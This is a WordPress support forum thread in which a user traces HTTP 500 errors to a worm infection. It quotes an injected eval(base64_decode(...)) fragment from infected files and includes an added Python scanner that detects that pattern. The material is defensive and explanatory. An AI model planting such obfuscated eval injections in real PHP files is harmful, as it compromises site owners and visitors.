help I lost everything & can not get anywhere (13 posts)

  1. mattw21
    Member
    Posted 1 month ago #

    My blog is at ezmoney.ezgo-now.com. My 2nd blog is ezpro-now. I deleted the 2nd one. I had installed wp-o-matic on the 2nd blog, which I use as a test blog. I was sure wp-o-matic was the problem. It is completely gone now & I still cannot get into my good blog. I'm freakin out at this point. I am not a wp expert but I am quite competent & have not had a problem in 4 months.

    At this point I would just like to upgrade to 2.8.4, assuming I can find my blog to upgrade. Perhaps I should just start fresh but I can't lose my stuff. I have 80 hrs. worth of blood, sweat & tears. I do have another web site as well & it works so I don't think it's my domain.
    ezgo-now.com

    Thanks

  2. samboll
    moderator
    Posted 1 month ago #

    delete the .htaccess in the subdomain
    ezmoney.ezgo-now.com
    blog should come up
    log in
    regenerate permalinks
    admin - settings - permalinks

  3. mattw21
    Member
    Posted 1 month ago #

    THANK YOU BUT I'M AFRAID IT DID NOT WORK. I DELETED .HTACCESS. FOR SOME REASON IT DOES NOT SHOW UP IN FILEZILLA BUT FINDING IT WITH MY FILE MANAGER WAS NOT A PROBLEM. WHEN I ENTER EZMONEY.EZGO-NOW.COM I GET A WEBSITE CANNOT BE DISPLAYED http 500. Both of my sites were running perfectly. I got back into them this morning & I got zip. I have made no changes, plug-ins, widgets, etc. As I said I thought the wp-o-matic might have fouled something up as I did have some problems with that at first. But that's been in my test blog for about a week now. I emailed Chilly Domain thinking that there might be a problem on their end although I have a regular web page running on ezgo-now.com & it works fine. I am going to upgrade to 2.8 but at this point I don't think that's going to get it working. I mean I just cannot see anything that looks like a problem. Things were working just too darn well. Thanks

  4. mattw21
    Member
    Posted 1 month ago #

    I just looked & I also have an htaccess file in my main domain ezgo-now.com. Should I remove it there as well?

  5. numeeja
    Member
    Posted 1 month ago #

    Do you have a backup of your files & database?

    Do you have access to your database in phpmyadmin?

    When you connect with filezilla can you see the wordpress files?

  6. mattw21
    Member
    Posted 1 month ago #

    Yes, I B/U last week. I was planning on upgrading but never got around to it. And yes either MySQL or phpMyAdmin. I can see everything in filezilla & everything seems to be where it has always been. It is probably simple once it comes to light. I honestly cannot find anything out of sorts. I like a good challenge but this is getting a little frustrating.

    Thank you

  7. jonimueller
    Member
    Posted 1 month ago #

    Some FTP clients hide files such as .htaccess. The filter (at least in WS-FTP) to display those "hidden" files is -la.

    Back up any .htaccess files you have and upload a blank .htaccess file (use notepad -- not MS Word!) to create a blank .htaccess file and upload it via FTP. Change its permissions to 666. Then see if the 500 Internal Server Error goes away. If so, you should be able to login to your WP dashboard and set up your permalinks again. Once you do that and things are still running okay, for security's sake, go back to FTP and set the permissions on .htaccess back to 644.

  8. mattw21
    Member
    Posted 1 month ago #

    I wish I could say my problem is fixed but it's only gotten worse. Since I was down anyway I tried to upgrade 2.6 to 2.8. Lots of weird problems. Found a few thousand similar to identical problems in the forums & tried a bunch of fixes but no go. So I gave up, carefully went through all of my dirs., files, etc, cleaned up the scraps & did a fresh clean install in the root directory. (http://ezgo-now.com) My other blog was & still is in a sub-directory. (http://ezmoney/ezgo-now.com) Anyway I got it installed, it worked fine, I went to lunch. Came back later, tried to open it & Whoa, same flippen problem. It can't be found, http 500 server error. PART 2// Today I found some real bad ugly changes to the wp-config.php & index.php files. Best description would be alphabet soup over 1/2 of the page. I haven't seen anything like it since my daughter was 3. Is there any possible way that wp-o-matic could be the culprit even though I was only running it on my test blog? I deleted that blog & wp-o-matic because I suspected it, its use immediately preceded all of my problems. Thanks Matt

  9. mattw21
    Member
    Posted 1 month ago #

    I probably should start a new post but, well anyway I think I might have been hacked. Yesterday I backed up the remaining files in the EZmoney sub-directory, deleted everything, installed a fresh copy of 2.8.4, tested everything, logged off & called it a night. That was about 2am. This AM, before I even brought the NEW ezgo-now.com Blog up, I checked the new files I had uploaded yesterday. The wp-config.php, index.php, and wp-content/index.php files were once again loaded with alphabet soup. The xmlrpc.php file appears to be ok but it's a big file so I could have missed something. It's not full of random letters anyway. Since this blog hasn't been used yet (20 min of testing) I don't have an htaccess file yet. (I'm using the ground-floor theme.)
    I have spent the entire day learning everything I can about this problem. I think I know what happened but I'd like a 2nd opinion plus I want to make sure that I do whatever is necessary to minimize future problems. Since I had never even considered that a hacker had corrupted these files I uploaded my old plug-ins & themes folder as well as my image files inside the wp-includes folder. Sure enough the index.php file inside the themes folder is corrupted with letters as well as all the individual index.php files for each theme. The corrupted files themselves are all pretty much the same (see below; the bold text is the random letters) & are nothing more than a bunch of benign letters. I have not found anything that resembles malicious code or script. However I've been doing this for 3 months so I'm really not sure I know what I'm looking for. But I do know I need some help. I can re-load the software easy enough but I need to find the source of the problem. I'm very thankful to be going through this early-on & not a year from now with a fully developed site & steady traffic.
    <?php eval(base64_decode('aW snZSddKSk7')); ?><?php /**
    Thanking you in advance. Matt
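
A read-only check for the injected prefix quoted in post 9, as an added example that is not part of the thread or of WordPress: it walks a site directory, flags every .php file containing eval(base64_decode('...')), and decodes the payload for inspection without executing it. The function names and the sample tree are constructed for illustration.

```python
import base64
import binascii
import os
import re
import tempfile

# Injected prefix quoted in the thread: eval(base64_decode('...')).
# Whitespace inside the quoted payload is tolerated.
INJECTED = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)

def preview(payload: bytes, limit: int = 60) -> str:
    """Decode the payload for reading only; nothing is ever executed."""
    try:
        decoded = base64.b64decode(b"".join(payload.split()), validate=True)
    except (binascii.Error, ValueError):
        return "<not valid base64>"
    return decoded[:limit].decode("latin-1")

def scan_tree(root: str) -> list:
    """Return sorted (relative path, byte offset, preview) hits in *.php files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            for m in INJECTED.finditer(data):
                hits.append((os.path.relpath(path, root), m.start(), preview(m.group(2))))
    return sorted(hits)

def demo() -> list:
    """Scan a constructed two-file tree: one injected file, one clean."""
    marker = base64.b64encode(b"/* constructed placeholder, not a real payload */")
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content"))
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(b"<?php eval(base64_decode('" + marker + b"')); ?><?php /**\n */\n")
        with open(os.path.join(root, "wp-content", "index.php"), "wb") as fh:
            fh.write(b"<?php\n// Silence is golden.\n")
        return scan_tree(root)

if __name__ == "__main__":
    for rel, offset, text in demo():
        print(f"{rel}: eval(base64_decode()) at byte {offset}: {text!r}")
```

Point scan_tree() at a downloaded copy of the site rather than the live server; an empty result covers only this one pattern and says nothing about the database or other backdoor forms.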

  10. numeeja
    Member
    Posted 1 month ago #

    It sounds like you fell victim to the worm before you upgraded. Once infected, upgrading does not fix it, as the backdoors are still there.

    http://wordpress.org/support/topic/307660?replies=1

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

  11. mattw21
    Member
    Posted 1 month ago #

    Thanks for the reply & the info. I know I still have much to learn but the 1 thing I know I will never learn or at least never understand is why? Why on earth would anyone especially someone with enough intelligence to hack into a site, hack into a site? To do it for personal gain or to settle a score is inexcusable. But to do it for the sake of doing it just blows my mind. Obviously this scum outgrew spray painting graffiti, knocking over trash cans & throwing eggs at passing cars. There I feel a little better.

    I will delete everything, run a scan, change username & passwords, download new & reinstall as per the instructions & suggestions from the above links. I'll also check my database.
    I did have 1 fully developed blog using the original (un-changed) amazing grace theme & running wp-2.6.4. Which files contain my posts & my pages &/or which files should I keep? Even though I am going to rebuild everything new at the very least I'd like to keep my pages & posts. Are those files stored in the database?
    Thanks,
    Matt

  12. numeeja
    Member
    Posted 1 month ago #

    It's an automated worm. Once a site is infected it launches attacks on other sites so spreading. I believe that apart from putting spam links on blogs it also tries to install malware on visitors' PCs. It's not like keying cars - the ultimate aim is to separate people from their money.

    The vulnerability that was exploited by this worm has been fixed in the latest versions which is why it is important to keep updated. Unfortunately upgrading after being attacked does not clean it up.

    Your database will be dirty so you'll need to clean it up or more likely export the real data to a file (tools -> export) and import into a new clean database, but checking it carefully.

    I'm afraid I can't really offer any in-depth advice on the process as my sites have not fallen victim to this so I have not had the need to really consider the best way to deal with it.

    Hopefully someone else will be able to chip in with a link to an in-depth step by step run-through which has worked for them.

    If not and/or you do not feel up to doing it for yourself I'm sure you'll be able to find a paid consultant to help via a message to the WP-Pro mailing list.

    Good Luck & I hope you manage to get it sorted out with the minimum of hassle.

  13. mattw21
    Member
    Posted 2 weeks ago #

    Thank you. I’ve been away for a week but I’m back to finish this.

    I have installed a fresh copy of WP 2.8 & it is working fine. Before installing it I had deleted all of my old database tables in my ezgo-now_wp database, i.e. wp1, wp2, wp3, etc. (I had multiple blogs) I changed the database table prefix in my new wp config file to wp2. (This is a new wp2 prefix as I had already deleted the old wp2 tables.) I wanted to delete the original wp_ tables as well but got cold feet at the last minute. Since these old tables are the only thing left that could still have malicious code in them I really want to delete them. (They are safely backed up just in case.)
    Am I safe to delete these? I’m almost positive I am but I didn’t because they have the same name as the database.

    To summarize I have a new EZgo-Now blog up and running. The ezgo-now_wp database has 10 newly created tables with a wp2 prefix & 15 old tables with a wp_ prefix. Am I safe to delete those 15 old wp_ tables?

    Thank you
    Matt
